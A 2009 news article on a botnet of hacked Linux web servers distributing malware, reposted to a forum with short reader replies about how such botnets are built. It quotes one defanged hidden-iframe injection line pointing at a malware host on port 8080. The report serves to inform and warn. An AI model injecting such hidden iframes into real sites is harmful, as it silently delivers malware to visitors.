Linux webserver botnet pushes malware
Attack of the open source zombies
By Dan Goodin in San Francisco •
Posted in Security, 12th September 2009 00:32 GMT
Free whitepaper – Vulnerability management buyer's checklist
A security researcher has discovered a cluster of infected Linux servers that have been corralled into a special ops botnet of sorts and used to
distribute malware to unwitting people browsing the web.
Each of the infected machines examined so far is a dedicated or virtual dedicated server running a legitimate website, Denis Sinegubko, an independent
researcher based in Magnitogorsk, Russia, told The Register. But in addition to running an Apache webserver to dish up benign content, they've also
been hacked to run a second webserver known as nginx, which serves malware.
"What we see here is a long awaited botnet of zombie web servers! A group of interconnected infected web servers with [a] common control center
involved in malware distribution," Sinegubko wrote here. "To make things more complex, this botnet of web servers is connected with the botnet of
infected home computer(s)."
The finding highlights the continuing evolution of bot herders as they look for new ways to issue commands to the hundreds of thousands of infected
zombies under their control. It came the same day anti-virus provider Symantec reported Google Groups was being used as a master control channel for a
recently discovered trojan. Four weeks ago, a researcher from Arbor Networks made a similar discovery when he found several Twitter profiles being
used to run a botnet.
The infected machines observed by Sinegubko serve legitimate traffic on port 80, the standard TCP port used by websites. Behind the scenes, the rogue
server sends malicious traffic over port 8080. The malicious payloads are then delivered with the help of dynamic DNS hosting providers, which offer
free domain names that are mapped to the IP address of the zombie webserver.
The links look something like this:
_frame "http ://a86x . homeunix . org:8080/ts/in.cgi?open2" width=997 height=0 style="visibility: hidden">
They are injected into legitimate websites, so that they are surreptitiously served when users browse the infected page.
"It's better to have both zombie clients and servers at the same time, Sinegubko wrote in an instant message. "The heterogeneous system provides
much more possibilities [and] makes the whole system more flexible."
It's unclear exactly how the servers have become infected. Sinegubko speculates they belong to careless administrators who allowed their root
passwords to be sniffed. Indeed, the part of the multi-staged attack that plants malicious iframes into legitimate webpages uses FTP passwords that
have been stolen using password sniffers. It's likely the zombie servers were compromised in the same fashion, he explained.
With about 100 nodes, the network is relatively small, making it unclear exactly what the attackers' intentions are. All of the boxes examined so far
have run the Apache webserver on a various distribution of Linux, he said.
"Probably it's some sort of proof-of-concept thing for hackers," he wrote. "Or maybe they have many more other compromised servers waiting for
their turn."
So far, Sinegubko said, DynDNS.com and No-IP.com, the two dynamic hosting providers used by the attackers, have been commendably responsive in
shutting down domains used in the attack. But he went on to say he is detecting about two new IP addresses every hour, an indication that this may not
be the last we've heard of the phenomenon. ®
In light of the topic on picking up viruses from this forum, I wondered if this might help.
www.theregister.co.uk...
|
Clever. Interesting that the iframe trick was highlighted. I mentioned that very trick in
The Porno Deciet that could jail millions....
I also find it interesting to see that the botnets are evolving. I designed one about 6 years ago as a developer exercise that was similar in nature.
Now they can be upgraded, modified, and even shut down from external ports on any machine. Very clever indeed.
|
Originally posted by rogerstigers
Clever. Interesting that the iframe trick was highlighted. I mentioned that very trick in
The Porno Deciet that could jail millions....
I also find it interesting to see that the botnets are evolving. I designed one about 6 years ago as a developer exercise that was similar in nature.
Now they can be upgraded, modified, and even shut down from external ports on any machine. Very clever indeed.
Hi, TY for the reply, I really know very little about all this, but thought others might be interested.
|
Typically what people who make these botnets do is they watch security sites that post known security flaws in the operating system. In this case,
Linux. Then someone writes a script that takes advantage of that hole and it just scans a whole range of IP addresses until it finds servers whose
Administrators haven't gotten around to patching their systems yet. They can find a whole lot of servers this way. Then they have root access to the
whole server, meaning that basically they own it, and they can install whatever software they please on it.
In many or most cases, the person who creates the botnet is not even the person wrote the hacking script. A lot of times one hacker will write the
script and then just release it on the net for anyone who wants to use it.
[edit on 13-9-2009 by theyreadmymind]
|